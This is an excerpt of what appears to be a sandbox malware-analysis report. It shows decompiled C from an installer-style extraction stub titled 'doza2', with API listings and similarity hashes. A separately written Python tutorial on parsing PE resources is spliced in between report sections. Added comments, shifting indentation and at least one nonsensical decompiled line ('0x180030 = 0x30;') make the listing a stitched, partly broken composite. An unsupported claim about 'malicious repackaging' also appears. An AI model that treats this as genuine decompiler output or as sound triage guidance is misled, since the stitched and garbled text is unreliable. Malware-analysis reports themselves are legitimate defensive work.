  • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00192F64,?,00000002,00000000), ref: 00193A5D
• LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00193AB3
  • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
  • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
  • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
• lstrcmpA.KERNEL32(<None>,00000000), ref: 00193AD0
• LocalFree.KERNEL32 ref: 00193B13
  • Part of subcall function 00196517: FindResourceA.KERNEL32(00190000,000007D6,00000005), ref: 0019652A
  • Part of subcall function 00196517: LoadResource.KERNEL32(00190000,00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00196538
  • Part of subcall function 00196517: DialogBoxIndirectParamA.USER32(00190000,00000000,00000547,001919E0,00000000), ref: 00196557
  • Part of subcall function 00196517: FreeResource.KERNEL32(00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00196560
• LocalFree.KERNEL32(00000000,00193100,00000000,00000000), ref: 00193AF4
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE
• API String ID: 2414642746-383193767
• Opcode ID: 1737c5b425ad83e42ea283e5c7f0edf2b6de0febfc26df6a6b9e695d13a74ee1
• Instruction ID: 09dea75269919d5999bb19de0adc1038055ca664c2985616fd401be621afe5ba
• Opcode Fuzzy Hash: 1737c5b425ad83e42ea283e5c7f0edf2b6de0febfc26df6a6b9e695d13a74ee1
• Instruction Fuzzy Hash: 22110B70300201ABDF24AF7A9C09E1B79F9EFDAB10B10413FB546D6AF0DB7988408665
Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
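To make the LICENSE lookup in the decompiled function concrete at the level of on-disk structures, the following added Python example (written for this page, not code from the report or from the sample) walks a raw .rsrc section the way FindResourceA(NULL, "LICENSE", RT_RCDATA) followed by LoadResource/LockResource does, then applies the same "<None>" test and stores the same HRESULT values the stub writes to *0x199124. The resource section, its RVA (0x5000), the language ID 0x409 and the EULA text are constructed for the example; the user_accepts flag stands in for the result the stub gets back from the dialog in E00196517.

```python
import struct

RT_RCDATA = 10               # type 0xA, as in the FindResourceA calls listed above
HRESULT_RESOURCE_DATA_NOT_FOUND = 0x80070714   # value the stub stores at *0x199124
HRESULT_CANCELLED = 0x800704C7                 # stored when the license dialog returns 0


def _read_dir(blob, off):
    """Entries (Name, OffsetToData) of the IMAGE_RESOURCE_DIRECTORY at section offset off."""
    n_named, n_ids = struct.unpack_from("<HH", blob, off + 12)
    return [struct.unpack_from("<II", blob, off + 16 + 8 * i) for i in range(n_named + n_ids)]


def _entry_name(blob, name_field):
    """Decode a Name field: high bit set -> IMAGE_RESOURCE_DIR_STRING_U, else an integer ID."""
    if name_field & 0x80000000:
        off = name_field & 0x7FFFFFFF
        (length,) = struct.unpack_from("<H", blob, off)
        return blob[off + 2:off + 2 + 2 * length].decode("utf-16-le")
    return name_field


def _match(entry_name, wanted):
    # FindResource compares string names case-insensitively; integer IDs must be equal.
    if isinstance(entry_name, str) and isinstance(wanted, str):
        return entry_name.upper() == wanted.upper()
    return entry_name == wanted


def find_resource(blob, rsrc_rva, res_type, name):
    """Mirror FindResourceA(NULL, name, res_type) + LoadResource/LockResource on a raw .rsrc
    section: walk type -> name -> language and return the first leaf's bytes, or None."""
    for type_field, type_off in _read_dir(blob, 0):
        if not _match(_entry_name(blob, type_field), res_type) or not type_off & 0x80000000:
            continue
        for name_field, name_off in _read_dir(blob, type_off & 0x7FFFFFFF):
            if not _match(_entry_name(blob, name_field), name) or not name_off & 0x80000000:
                continue
            for _lang, leaf in _read_dir(blob, name_off & 0x7FFFFFFF):
                if leaf & 0x80000000:
                    continue
                data_rva, size = struct.unpack_from("<II", blob, leaf)  # IMAGE_RESOURCE_DATA_ENTRY
                start = data_rva - rsrc_rva                              # RVA -> offset in section
                return blob[start:start + size]
    return None


def license_step(blob, rsrc_rva, user_accepts=True):
    """The decompiled function's decision, as (action, HRESULT stored at *0x199124)."""
    text = find_resource(blob, rsrc_rva, RT_RCDATA, "LICENSE")
    if text is None:
        return "error", HRESULT_RESOURCE_DATA_NOT_FOUND
    # LocalAlloc(LPTR, size + 1) zero-fills, so lstrcmpA compares the bytes up to the first NUL.
    if text.split(b"\0", 1)[0] == b"<None>":
        return "skip", 0
    return ("show", 0) if user_accepts else ("error", HRESULT_CANCELLED)


def build_rsrc(license_bytes, rsrc_rva=0x5000):
    """Constructed .rsrc section (not from the sample): one RT_RCDATA resource named
    LICENSE, language 0x409, laid out root@0x00 -> type@0x18 -> name@0x30 -> data@0x48."""
    name = "LICENSE".encode("utf-16-le")
    str_off = 0x58
    data_off = str_off + 2 + len(name)
    out = bytearray()

    def directory(entries):
        named = sum(1 for n, _ in entries if n & 0x80000000)
        out.extend(struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named))
        for entry in entries:
            out.extend(struct.pack("<II", *entry))

    directory([(RT_RCDATA, 0x80000000 | 0x18)])             # root: type 10 -> subdirectory
    directory([(0x80000000 | str_off, 0x80000000 | 0x30)])  # type: name "LICENSE" -> subdirectory
    directory([(0x409, 0x48)])                              # name: lang 0x409 -> data entry
    out.extend(struct.pack("<IIII", rsrc_rva + data_off, len(license_bytes), 0, 0))
    out.extend(struct.pack("<H", len(name) // 2) + name)    # IMAGE_RESOURCE_DIR_STRING_U
    out.extend(license_bytes)
    return bytes(out)


if __name__ == "__main__":
    for eula in (b"<None>", b"Sample EULA text, constructed for this example"):
        print(eula[:12], license_step(build_rsrc(eula), 0x5000))
    print(license_step(b"\0" * 16, 0x5000))
```

On a real sample, pass the raw bytes of the .rsrc section together with its VirtualAddress from the section table; the RVA-to-offset subtraction in find_resource is what LoadResource does for you at runtime. An empty or "<None>" LICENSE resource is a quick triage signal that the packer was configured to show no license dialog, which is the usual configuration for malicious repackaging.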

                                                                                                                                                                                                                                    C-Code - Quality: 94%
			E001924E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x198004; // 0x21bd9a3c   __security_cookie
				_v8 = _t7 ^ _t27; // /GS stack cookie for this frame
				_t25 = 0x104; // MAX_PATH
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0019658A( &_v268, 0x104, "wininit.ini"); // path helper: <windir>\wininit.ini, bounded to MAX_PATH
					// wininit.ini is the legacy Windows 9x boot-time rename/delete list used by installers.
					// All-NULL section/key/value flushes the profile cache so the size read below is current.
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40); // OF_SHARE_DENY_NONE
					if(_t25 != 0xffffffff) { // HFILE_ERROR
						_t26 = _llseek(_t25, 0, 2); // FILE_END: current file size
						_lclose(_t25);
					}
				}
				// E00196CE0 is the __security_check_cookie epilogue; the value returned to the caller
				// is _t26, the size of wininit.ini, or 0 if it is absent or cannot be opened.
				return E00196CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}


                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00192506
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0019252C
                                                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0019253B
                                                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0019254C
                                                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00192555
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                    • Opcode ID: 22bbfe699905cad73879b3c5401264b56b22c6e29b8ed7c18de2a4ebe32b385d
                                                                                                                                                                                                                                    • Instruction ID: eed31c57369d91a012c8a10075d7d61862dfcdbbf0b918de9b04fe31204aaa2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22bbfe699905cad73879b3c5401264b56b22c6e29b8ed7c18de2a4ebe32b385d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C01B53260011867DB20AB659C0CEDF7B7CDF85750F450156FA49D3190DF748E85CAE1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E001936EE(CHAR* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                                                    				signed char _t115;
                                                                                                                                                                                                                                    				short _t119;
                                                                                                                                                                                                                                    				CHAR* _t123;
                                                                                                                                                                                                                                    				CHAR* _t124;
                                                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                                                    				CHAR* _t138;
                                                                                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t72 =  *0x198004; // 0x21bd9a3c
                                                                                                                                                                                                                                    				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                    				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                    				_t115 = __ecx;
                                                                                                                                                                                                                                    				_t135 = 0;
                                                                                                                                                                                                                                    				_v432 = __ecx;
                                                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                                                    				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                    					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                    					_t119 = 2;
                                                                                                                                                                                                                                    					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                    					__eflags = _t77;
                                                                                                                                                                                                                                    					if(_t77 == 0) {
                                                                                                                                                                                                                                    						_t119 = 0;
                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                    						 *0x198184 = 1;
                                                                                                                                                                                                                                    						 *0x198180 = 1;
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						 *0x199a40 = _t119;
                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                    						__eflags =  *0x198a34 - _t138; // 0x0
                                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                                                                    						if(_t115 == 0) {
                                                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v428 = _t135;
                                                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                                                    						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                    						_t11 =  &_v420;
                                                                                                                                                                                                                                    						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                    						__eflags =  *_t11;
                                                                                                                                                                                                                                    						_v440 = _t115;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                    							_v436 = E00192A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                    							_t91 = E00192A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                    							_t123 = _v436;
_t133 = 0x54d;
__eflags = _t123;
if(_t123 < 0) {
    L32:
    __eflags = _v420 - 1;
    if(_v420 == 1) {
        _t138 = 0x54c;
        L36:
        __eflags = _t138;
        if(_t138 != 0) {
            L40:
            __eflags = _t138 - _t133;
            if(_t138 == _t133) {
                L30:
                _v420 = _v420 & 0x00000000;
                _t115 = 0;
                _v436 = _v436 & 0x00000000;
                __eflags = _t138 - _t133;
                _t133 = _v432;
                if(__eflags != 0) {
                    _t124 = _v440;
                } else {
                    _t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                    _v420 = &_v268;
                }
                __eflags = _t124;
                if(_t124 == 0) {
                    _t135 = _v436;
                } else {
                    _t99 = _t124[0x30];
                    _t135 = _t124[0x34] + 0x84 + _t133;
                    __eflags = _t99 & 0x00000001;
                    if((_t99 & 0x00000001) == 0) {
                        asm("sbb ebx, ebx");
                        _t115 = ~(_t99 & 2) & 0x00000101;
                    } else {
                        _t115 = 0x104;
                    }
                }
                __eflags = *0x198a38 & 0x00000001;
                if((*0x198a38 & 0x00000001) != 0) {
                    L64:
                    _push(0);
                    _push(0x30);
                    _push(_v420);
                    _push("doza2");
                    goto L65;
                } else {
                    __eflags = _t135;
                    if(_t135 == 0) {
                        goto L64;
                    }
                    __eflags = *_t135;
                    if(*_t135 == 0) {
                        goto L64;
                    }
                    MessageBeep(0);
                    _t94 = E0019681F(_t115);
                    __eflags = _t94;
                    if(_t94 == 0) {
                        L57:
                        0x180030 = 0x30;
                        L58:
                        _t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
                        __eflags = _t115 & 0x00000004;
                        if((_t115 & 0x00000004) == 0) {
                            __eflags = _t115 & 0x00000001;
                            if((_t115 & 0x00000001) == 0) {
                                goto L66;
                            }
                            __eflags = _t97 - 1;
                            L62:
                            if(__eflags == 0) {
                                _t138 = 0;
                            }
                            goto L66;
                        }
                        __eflags = _t97 - 6;
                        goto L62;
                    }
                    _t98 = E001967C9(_t124, _t124);
                    __eflags = _t98;
                    if(_t98 == 0) {
                        goto L57;
                    }
                    goto L58;
                }
            }
            __eflags = _t138 - 0x54c;
            if(_t138 == 0x54c) {
                goto L30;
            }
            __eflags = _t138;
            if(_t138 == 0) {
                goto L66;
            }
            _t135 = 0;
            __eflags = 0;
            goto L44;
        }
        L37:
        _t129 = _v432;
        __eflags = _t129[0x7c];
        if(_t129[0x7c] == 0) {
            goto L66;
        }
        _t133 = &_v268;
        _t104 = E001928E8(_t129, &_v268, _t129, &_v428);
        __eflags = _t104;
        if(_t104 != 0) {
            goto L66;
        }
        _t135 = _v428;
        _t133 = 0x54d;
        _t138 = 0x54d;
        goto L40;
    }
    goto L33;
}
__eflags = _t91;
if(_t91 > 0) {
    goto L32;
}
__eflags = _t123;
if(_t123 != 0) {
    __eflags = _t91;
    if(_t91 != 0) {
        goto L37;
    }
    __eflags = (_v416.dwBuildNumber & 0x0000ffff) - *((intOrPtr*)(_v424 + _t115 + 0x14));
    L27:
    if(__eflags <= 0) {
        goto L37;
    }
    L28:
    __eflags = _t135;
    if(_t135 == 0) {
        goto L33;
    }
    _t138 = 0x54c;
    goto L30;
}
__eflags = _t91;
                                                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                                                    						 *0x199a40 = _t119;
                                                                                                                                                                                                                                    						 *0x198184 = 1;
                                                                                                                                                                                                                                    						 *0x198180 = 1;
                                                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                                                    						 *0x199a40 = 1;
                                                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							 *0x198184 = _t135;
                                                                                                                                                                                                                                    							 *0x198180 = _t135;
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                                                    					E001944B9(0, _t138);
                                                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                                                    					return E00196CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x001938b0
                                                                                                                                                                                                                                    0x001938b2
                                                                                                                                                                                                                                    0x001938b9
                                                                                                                                                                                                                                    0x001938bb
                                                                                                                                                                                                                                    0x001938c1
                                                                                                                                                                                                                                    0x00193975
                                                                                                                                                                                                                                    0x001938c7
                                                                                                                                                                                                                                    0x001938de
                                                                                                                                                                                                                                    0x001938e0
                                                                                                                                                                                                                                    0x001938e0
                                                                                                                                                                                                                                    0x0019397b
                                                                                                                                                                                                                                    0x0019397d
                                                                                                                                                                                                                                    0x001939a9
                                                                                                                                                                                                                                    0x0019397f
                                                                                                                                                                                                                                    0x00193982
                                                                                                                                                                                                                                    0x0019398b
                                                                                                                                                                                                                                    0x0019398d
                                                                                                                                                                                                                                    0x0019398f
                                                                                                                                                                                                                                    0x0019399f
                                                                                                                                                                                                                                    0x001939a1
                                                                                                                                                                                                                                    0x00193991
                                                                                                                                                                                                                                    0x00193991
                                                                                                                                                                                                                                    0x00193991
                                                                                                                                                                                                                                    0x0019398f
                                                                                                                                                                                                                                    0x001939af
                                                                                                                                                                                                                                    0x001939b6
                                                                                                                                                                                                                                    0x00193a0f
                                                                                                                                                                                                                                    0x00193a0f
                                                                                                                                                                                                                                    0x00193a11
                                                                                                                                                                                                                                    0x00193a13
                                                                                                                                                                                                                                    0x00193a19
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939b8
                                                                                                                                                                                                                                    0x001939b8
                                                                                                                                                                                                                                    0x001939ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939bc
                                                                                                                                                                                                                                    0x001939bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939c3
                                                                                                                                                                                                                                    0x001939c9
                                                                                                                                                                                                                                    0x001939ce
                                                                                                                                                                                                                                    0x001939d0
                                                                                                                                                                                                                                    0x001939e3
                                                                                                                                                                                                                                    0x001939e5
                                                                                                                                                                                                                                    0x001939e6
                                                                                                                                                                                                                                    0x001939f1
                                                                                                                                                                                                                                    0x001939f7
                                                                                                                                                                                                                                    0x001939fa
                                                                                                                                                                                                                                    0x00193a01
                                                                                                                                                                                                                                    0x00193a04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193a06
                                                                                                                                                                                                                                    0x00193a09
                                                                                                                                                                                                                                    0x00193a09
                                                                                                                                                                                                                                    0x00193a0b
                                                                                                                                                                                                                                    0x00193a0b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193a09
                                                                                                                                                                                                                                    0x001939fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939fc
                                                                                                                                                                                                                                    0x001939d3
                                                                                                                                                                                                                                    0x001939d8
                                                                                                                                                                                                                                    0x001939da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939dc
                                                                                                                                                                                                                                    0x001939b6
                                                                                                                                                                                                                                    0x00193955
                                                                                                                                                                                                                                    0x0019395b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193961
                                                                                                                                                                                                                                    0x00193963
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193969
                                                                                                                                                                                                                                    0x00193969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193969
                                                                                                                                                                                                                                    0x00193915
                                                                                                                                                                                                                                    0x00193915
                                                                                                                                                                                                                                    0x0019391b
                                                                                                                                                                                                                                    0x0019391f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019392d
                                                                                                                                                                                                                                    0x00193933
                                                                                                                                                                                                                                    0x00193938
                                                                                                                                                                                                                                    0x0019393a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193940
                                                                                                                                                                                                                                    0x00193946
                                                                                                                                                                                                                                    0x0019394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001938f2
                                                                                                                                                                                                                                    0x00193843
                                                                                                                                                                                                                                    0x00193845
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019384b
                                                                                                                                                                                                                                    0x0019384d
                                                                                                                                                                                                                                    0x00193883
                                                                                                                                                                                                                                    0x00193885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019389a
                                                                                                                                                                                                                                    0x0019389e
0x0019389e
0x00000000
0x00000000
0x001938a0
0x001938a0
0x001938a2
0x00000000
0x00000000
0x001938a4
0x00000000
0x001938a4
0x0019384f
0x00193851
0x00193857
0x0019386e
0x00193877
0x0019387b
0x00000000
0x00000000
0x00000000
0x00193881
0x00193859
0x0019385c
0x00193862
0x00193866
0x00000000
0x00000000
0x00193868
0x00000000
0x001938f4
0x001938f4
0x001938f5
0x001938fb
0x00193901
0x00193901
0x00000000
0x0019390a
0x0019374b
0x0019374e
0x0019375c
0x00193764
0x00193769
0x0019376e
0x00193771
0x0019379c
0x0019379f
0x00000000
0x00000000
0x001937a3
0x001937a4
0x00000000
0x001937a4
0x00193773
0x00193777
0x00193778
0x0019377f
0x00193781
0x0019378e
0x0019378e
0x00193794
0x00000000
0x00193794
0x00193783
0x00000000
0x00000000
0x00193785
0x0019378c
0x00000000
0x00000000
0x00000000
0x0019378c
0x00193750
0x00000000
0x0019372d
0x0019372d
0x0019396b
0x0019396b
0x0019396c
0x0019396e
0x0019396f
0x00193a1e
0x00193a1e
0x00193a22
0x00193a27
0x00193a3e
0x00193a3e

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00193723
• MessageBeep.USER32(00000000), ref: 001939C3
• MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 001939F1
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$doza2
• API String ID: 2519184315-2054879145
• Opcode ID: da120f8d7f4d2d1bd65a6bfe4ab790a7ced0f50056d28d7315bd143d30bed39f
• Instruction ID: e610d628f01727af93daa01ac59589719554dd424ac9841abdbfcba8d5b9cd47
• Opcode Fuzzy Hash: da120f8d7f4d2d1bd65a6bfe4ab790a7ced0f50056d28d7315bd143d30bed39f
• Instruction Fuzzy Hash: 5091D171E012249FDF398B55CC81BBAB7B1EB46304F1501AAD9AADB251DB708F81CB41
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
